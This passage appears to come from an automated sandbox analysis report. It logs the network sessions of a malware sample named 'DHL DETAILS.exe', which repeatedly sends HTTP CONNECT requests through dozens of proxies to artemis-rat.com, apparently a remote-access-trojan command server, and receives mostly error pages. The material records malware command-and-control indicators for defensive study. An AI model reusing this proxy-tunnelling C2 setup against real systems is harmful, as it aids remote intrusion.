                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    589192.168.2.551706193.239.56.8480816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.661227942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    590192.168.2.55171647.56.110.20489896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.661714077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.979192972 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.16.1
                                                                                    Date: Sat, 09 Mar 2024 11:59:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    591192.168.2.55164690.188.250.16806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.664478064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    592192.168.2.5519938.213.128.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.666614056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    593192.168.2.5519968.213.128.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.668745041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    594192.168.2.5519998.213.128.64436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.670644045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    595192.168.2.551841162.159.242.158806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.671068907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.832056999 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    596192.168.2.551856104.16.81.76806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.675703049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.830692053 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    597192.168.2.55170439.108.229.1480026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.675965071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.018224001 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    598192.168.2.551712120.77.148.13880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.681341887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.019032001 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    599192.168.2.551873172.67.35.15806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.683753967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.838059902 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    600192.168.2.55130618.166.142.18010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.683799028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    601192.168.2.551734158.255.215.50169936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.689001083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.991905928 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    602192.168.2.55177772.195.34.5941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.718941927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    603192.168.2.55117341.242.116.150500036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.719100952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.825783968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.868649006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    604192.168.2.55134251.158.98.197163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.722111940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.723985910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.724534988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    605192.168.2.55169438.54.116.931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.726810932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.132643938 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    606192.168.2.551819159.65.245.255806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.728636026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.286232948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.989573956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.003155947 CET442INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Server: Apache/2.4.18 (Ubuntu)
                                                                                    Content-Length: 281
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    607192.168.2.55181270.166.167.55577456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.734371901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    608192.168.2.551775198.44.255.3806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.736243010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    609192.168.2.55183492.204.134.38554256352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.740747929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    610192.168.2.55177341.111.243.18806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
